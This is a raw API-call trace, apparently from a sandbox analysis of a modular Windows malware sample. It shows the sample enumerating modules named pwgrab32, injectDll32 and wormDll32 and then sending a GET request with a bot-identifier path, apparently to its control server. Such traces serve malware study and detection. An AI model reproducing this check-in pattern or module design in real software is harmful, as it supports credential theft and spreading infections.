	[0244.612] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0244.612] GetFileTime (in: hFile=0x66c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.612] CloseHandle (hObject=0x66c) returned 1
	[0244.612] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7980e840, dwHighDateTime=0x1d50a6a)) 
	[0244.612] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0244.612] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0244.612] GetFileTime (in: hFile=0x66c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.612] CloseHandle (hObject=0x66c) returned 1
	[0244.613] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7980e840, dwHighDateTime=0x1d50a6a)) 
	[0244.613] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0244.613] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0244.613] GetFileTime (in: hFile=0x66c, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.613] CloseHandle (hObject=0x66c) returned 1
	[0244.613] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7980e840, dwHighDateTime=0x1d50a6a)) 
	[0244.613] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0244.613] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0244.613] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0244.613] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0244.613] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b7080
	[0244.614] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0244.614] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0244.614] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1810
	[0244.614] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x234f30
	[0244.614] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0244.614] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0244.614] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1810, Size=0x10) returned 0x27e1468
	[0244.614] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22caa30
	[0244.614] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0244.614] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0244.614] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1468, Size=0x10) returned 0x27e1810
	[0244.614] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2738590
	[0244.614] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0244.614] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0244.614] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1810, Size=0x10) returned 0x27e1468
	[0244.614] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24a3b8
	[0244.614] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0244.614] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0244.614] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1468, Size=0x20) returned 0x27bfea0
	[0244.614] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x271f00
	[0244.614] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0244.615] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27bfea0, Size=0x20) returned 0x27c2628
	[0244.615] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26e438
	[0244.615] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 1
	[0244.615] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27c2628, Size=0x20) returned 0x27bfea0
	[0244.615] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0244.615] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 0
	[0244.615] GetLastError () returned 0x12
	[0244.615] FindClose (in: hFindFile=0x22b7080 | out: hFindFile=0x22b7080) returned 1
	[0244.615] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0244.615] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26cdc48
	[0244.615] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x26cdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0244.615] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0244.615] GetFileTime (in: hFile=0x66c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.615] CloseHandle (hObject=0x66c) returned 1
	[0244.616] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7980e840, dwHighDateTime=0x1d50a6a)) 
	[0244.616] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0244.616] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26cdc48
	[0244.616] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x26cdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0244.616] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0244.616] GetFileTime (in: hFile=0x66c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.616] CloseHandle (hObject=0x66c) returned 1
	[0244.616] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7980e840, dwHighDateTime=0x1d50a6a)) 
	[0244.616] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0244.616] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26cdc48
	[0244.616] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x26cdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0244.616] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0244.617] GetFileTime (in: hFile=0x66c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.617] CloseHandle (hObject=0x66c) returned 1
	[0244.617] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7980e840, dwHighDateTime=0x1d50a6a)) 
	[0244.617] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0244.617] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26cdc48
	[0244.617] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x26cdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0244.617] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0244.617] GetFileTime (in: hFile=0x66c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.617] CloseHandle (hObject=0x66c) returned 1
	[0244.617] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7980e840, dwHighDateTime=0x1d50a6a)) 
	[0244.618] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0244.618] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26cdc48
	[0244.618] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x26cdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
	[0244.618] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0244.618] GetFileTime (in: hFile=0x66c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.618] CloseHandle (hObject=0x66c) returned 1
	[0244.618] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7980e840, dwHighDateTime=0x1d50a6a)) 
	[0244.618] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0244.618] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26cdc48
	[0244.618] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x26cdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0244.618] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0244.618] GetFileTime (in: hFile=0x66c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.619] CloseHandle (hObject=0x66c) returned 1
	[0244.619] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7980e840, dwHighDateTime=0x1d50a6a)) 
	[0244.619] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32") returned="wormDll32"
	[0244.619] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26cdc48
	[0244.619] GetFullPathNameW (in: lpFileName="Data\\wormDll32", nBufferLength=0x105, lpBuffer=0x26cdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32", lpFilePart=0x0) returned 0x3f
	[0244.619] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\wormdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0244.619] GetFileTime (in: hFile=0x66c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.619] CloseHandle (hObject=0x66c) returned 1
	[0244.619] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7980e840, dwHighDateTime=0x1d50a6a)) 
	[0244.620] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0244.620] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0244.620] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/Tn6Ok0HXqDYvCUl2Pj0Kh2Ph2LgwEUl2/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0244.620] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0244.620] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0245.008] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
	[0245.009] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0245.009] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x3) returned 1
